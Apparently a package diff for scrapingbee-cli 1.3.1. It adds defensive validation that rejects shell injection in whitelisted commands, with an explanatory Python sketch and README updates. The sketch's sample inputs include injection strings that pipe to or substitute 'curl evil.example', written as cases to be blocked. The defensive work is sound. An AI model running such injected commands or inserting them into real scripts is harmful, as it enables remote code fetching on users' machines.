+def _is_single_segment_whitelisted(segment: str) -> bool:
+    """Check if a single command segment matches the whitelist."""
     for allowed in get_whitelist():
-        if
+        if segment.startswith(allowed):
             return True
     return False
 
 
+def is_command_whitelisted(cmd: str) -> bool:
+    """Check if a command is safe to execute against the whitelist.
+
+    Validates ALL segments in a piped/chained command, not just the first.
+    Also blocks command/process substitution which can bypass segment validation.
+    """
+    cmd_stripped = cmd.strip()
+
+    # Block substitution patterns that bypass whitelist validation
+    if _SUBSTITUTION_PATTERNS.search(cmd_stripped):
+        return False
+
+    # Validate every segment in the command chain
+    segments = _split_shell_segments(cmd_stripped)
+    if not segments:
+        return False
+    return all(_is_single_segment_whitelisted(seg) for seg in segments)
+
+
 def require_exec(feature_name: str, cmd: str | None = None) -> None:
     """Gate check — call before any shell execution.
 
     Required: SCRAPINGBEE_ALLOW_EXEC=1 + SCRAPINGBEE_UNSAFE_VERIFIED=1
     Optional: SCRAPINGBEE_ALLOWED_COMMANDS — if set, command must match whitelist.
+    Blocks shell injection patterns (pipes to non-whitelisted commands,
+    command substitution, backticks, process substitution).
     """
     if not is_exec_enabled():
         click.echo(_VAGUE_ERROR, err=True)
|
|
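The two-stage check introduced in this hunk (reject substitution syntax first, then require every chained segment to start with a whitelisted command) can be exercised in isolation. The sketch below reuses the two regular expressions from the diff but takes the whitelist as an explicit argument instead of reading `SCRAPINGBEE_ALLOWED_COMMANDS`; the names `is_allowed`, `split_segments`, and the sample whitelist are assumptions made for illustration.

```python
import re

# Same alternatives as _SUBSTITUTION_PATTERNS in the diff.
SUBSTITUTION = re.compile(r"\$\(|`|\$\{|<\(|>\(")


def split_segments(cmd: str) -> list[str]:
    """Split on ||, &&, |, ;, & and newlines, dropping empty pieces."""
    parts = re.split(r"\|\||&&|[|;&\n]", cmd)
    return [p.strip() for p in parts if p.strip()]


def is_allowed(cmd: str, whitelist: list[str]) -> bool:
    """Return True only if no substitution is present and all segments match."""
    cmd = cmd.strip()
    if SUBSTITUTION.search(cmd):
        return False
    segments = split_segments(cmd)
    if not segments:
        return False
    return all(any(seg.startswith(a) for a in whitelist) for seg in segments)


ALLOWED = ["jq", "head"]  # hypothetical whitelist
for candidate in [
    "jq .title | head -1",
    "jq .title | curl evil.example",
    'jq "$(curl evil.example)"',
    "jq '.a | .b'",
]:
    print(f"{candidate!r}: {is_allowed(candidate, ALLOWED)}")
```

Two properties of this approach are worth keeping in mind. The split is not quote-aware, so a pipe inside a quoted jq filter produces an extra segment and the command is rejected, which errs on the side of blocking. Matching is by prefix, so any segment that merely begins with a whitelisted string passes.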
@@ -81,7 +126,7 @@ def require_exec(feature_name: str, cmd: str | None = None) -> None:
     # Whitelist is optional — if set, enforce it
     if cmd is not None and is_whitelist_enabled() and not is_command_whitelisted(cmd):
         click.echo(
-
+            "Command blocked: contains non-whitelisted command or shell injection pattern.",
             err=True,
         )
         raise SystemExit(1)
|
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
Metadata-Version: 2.4
|
|
2
2
|
Name: scrapingbee-cli
|
|
3
|
-
Version: 1.3.
|
|
3
|
+
Version: 1.3.1
|
|
4
4
|
Summary: Command-line client for the ScrapingBee API: scrape pages (single or batch), crawl sites, check usage/credits, and use Google Search, Fast Search, Amazon, Walmart, YouTube, and ChatGPT from the terminal.
|
|
5
5
|
Author: ScrapingBee
|
|
6
6
|
License-Expression: MIT
|
|
@@ -81,7 +81,9 @@ scrapingbee [command] [arguments] [options]
|
|
|
81
81
|
- **`scrapingbee --help`** – List all commands.
|
|
82
82
|
- **`scrapingbee [command] --help`** – Options and parameters for that command.
|
|
83
83
|
|
|
84
|
-
**Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
|
|
84
|
+
**Options are per-command.** Each command has its own set of options — run `scrapingbee [command] --help` to see them. Common options across batch-capable commands include `--output-file`, `--output-dir`, `--input-file`, `--input-column`, `--concurrency`, `--output-format`, `--retries`, `--backoff`, `--resume`, `--update-csv`, `--no-progress`, `--extract-field`, `--fields`, `--deduplicate`, `--sample`, `--post-process`, `--on-complete`, `--scraping-config`, and `--verbose`. For details, see the [documentation](https://www.scrapingbee.com/documentation/).
|
|
85
|
+
|
|
86
|
+
**Parameter values:** Choice parameters accept both hyphens and underscores interchangeably (e.g. `--sort-by price-low` and `--sort-by price_low` both work).
|
|
85
87
|
|
|
86
88
|
### Commands
|
|
87
89
|
|
|
@@ -117,6 +119,7 @@ scrapingbee [command] [arguments] [options]
|
|
|
117
119
|
- **Scheduling:** `scrapingbee schedule --every 1d --name prices scrape --input-file products.csv --update-csv` registers a cron job. Use `--list`, `--stop NAME`, or `--stop all`.
|
|
118
120
|
- **Deduplication & sampling:** `--deduplicate` removes duplicate URLs; `--sample 100` processes only 100 random items.
|
|
119
121
|
- **RAG chunking:** `scrape --chunk-size 500 --chunk-overlap 50 --return-page-markdown true` outputs NDJSON chunks ready for vector DB ingestion.
|
|
122
|
+
- **Scraping configurations:** `--scraping-config "My-Config"` applies a pre-saved configuration from your ScrapingBee dashboard. Inline options override config settings. Create configurations in the [request builder](https://app.scrapingbee.com/).
|
|
120
123
|
|
|
121
124
|
### Examples
|
|
122
125
|
|
|
File without changes